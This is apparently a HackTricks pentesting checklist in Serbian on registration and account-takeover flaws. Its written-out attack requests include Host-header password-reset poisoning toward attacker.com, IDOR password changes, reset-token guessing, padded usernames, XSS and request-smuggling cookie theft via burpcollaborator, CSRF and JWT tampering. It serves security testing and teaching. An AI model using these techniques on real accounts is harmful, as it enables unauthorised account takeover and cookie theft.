Registration & Takeover Vulnerabilities
Last updated
Last updated
Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Pokušajte da generišete koristeći postojeće korisničko ime
Proverite varijacije email-a:
velika slova
+1@
dodajte tačku u email
specijalni karakteri u imenu email-a (%00, %09, %20)
Stavite crne karaktere posle email-a: test@test.com a
victim@gmail.com@attacker.com
victim@attacker.com@gmail.com
Proverite da li možete da otkrijete kada je korisničko ime već registrovano unutar aplikacije.
Kreirajući korisnika, proverite politiku lozinki (proverite da li možete koristiti slabe lozinke). U tom slučaju možete pokušati da bruteforce-ujete akreditive.
Proverite ovu stranicu da biste naučili kako da pokušate preuzimanje naloga ili izvučete informacije putem SQL Injekcija u registracionim formama.
Kada se registrujete, pokušajte da promenite email i proverite da li je ova promena ispravno validirana ili možete promeniti na proizvoljne email adrese.
Proverite da li možete koristiti disposable email-ove
Duga lozinka (>200) dovodi do DoS
Proverite ograničenja brzine na kreiranju naloga
Koristite username@burp_collab.net i analizirajte callback
Zatražite resetovanje lozinke na vašu email adresu
Kliknite na link za resetovanje lozinke
Ne menjajte lozinku
Kliknite na bilo koje 3rd party sajtove (npr: Facebook, Twitter)
Presretnite zahtev u Burp Suite proxy
Proverite da li referer header curi token za resetovanje lozinke.
Presretnite zahtev za resetovanje lozinke u Burp Suite
Dodajte ili izmenite sledeće heder-e u Burp Suite : Host: attacker.com
, X-Forwarded-Host: attacker.com
Prosledite zahtev sa izmenjenim heder-om
http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com
Potražite URL za resetovanje lozinke na osnovu host header-a kao što je: https://attacker.com/reset-password.php?token=TOKEN
Napadač mora da se prijavi sa svojim nalogom i ode na funkciju Promena lozinke.
Pokrenite Burp Suite i presretnite zahtev.
Pošaljite ga na repeater tab i izmenite parametre: ID korisnika/email
powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})
Token za resetovanje lozinke treba da bude nasumično generisan i jedinstven svaki put. Pokušajte da odredite da li token ističe ili je uvek isti, u nekim slučajevima algoritam za generisanje je slab i može se pogoditi. Sledeće varijable mogu biti korišćene od strane algoritma.
Vreme
ID korisnika
Email korisnika
Ime i prezime
Datum rođenja
Kriptografija
Samo brojevi
Mala sekvenca tokena (karakteri između [A-Z,a-z,0-9])
Ponovna upotreba tokena
Datum isteka tokena
Pokrenite zahtev za resetovanje lozinke koristeći API/UI za specifičan email npr: test@mail.com
Istražite odgovor servera i proverite za resetToken
Zatim koristite token u URL-u kao https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]
Registrujte se na sistem sa korisničkim imenom identičnim korisničkom imenu žrtve, ali sa razmacima umetnutim pre i/ili posle korisničkog imena. npr: "admin "
Zatražite resetovanje lozinke sa svojim zlonamernim korisničkim imenom.
Iskoristite token poslat na vaš email i resetujte lozinku žrtve.
Priključite se nalogu žrtve sa novom lozinkom.
Platforma CTFd je bila ranjiva na ovaj napad. Pogledajte: CVE-2020-7245
Pronađite XSS unutar aplikacije ili poddomena ako su kolačići ograničeni na roditeljski domen: *.domain.com
Curite trenutni kolačić sesije
Autentifikujte se kao korisnik koristeći kolačić
1. Koristite smuggler da detektujete tip HTTP Request Smuggling-a (CL, TE, CL.TE)
powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h
2. Kreirajte zahtev koji će prepisati POST / HTTP/1.1
sa sledećim podacima:
GET http://something.burpcollaborator.net HTTP/1.1 X:
sa ciljem da otvorite preusmeravanje žrtava na burpcollab i ukradete njihove kolačiće
3. Finalni zahtev može izgledati ovako
Hackerone izveštaji o eksploataciji ovog buga * https://hackerone.com/reports/737140 * https://hackerone.com/reports/771666
Kreirajte payload za CSRF, npr: “HTML forma sa automatskim slanjem za promenu lozinke”
Pošaljite payload
JSON Web Token može se koristiti za autentifikaciju korisnika.
Izmenite JWT sa drugim ID-jem korisnika / Email-om
Proverite slab JWT potpis
Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)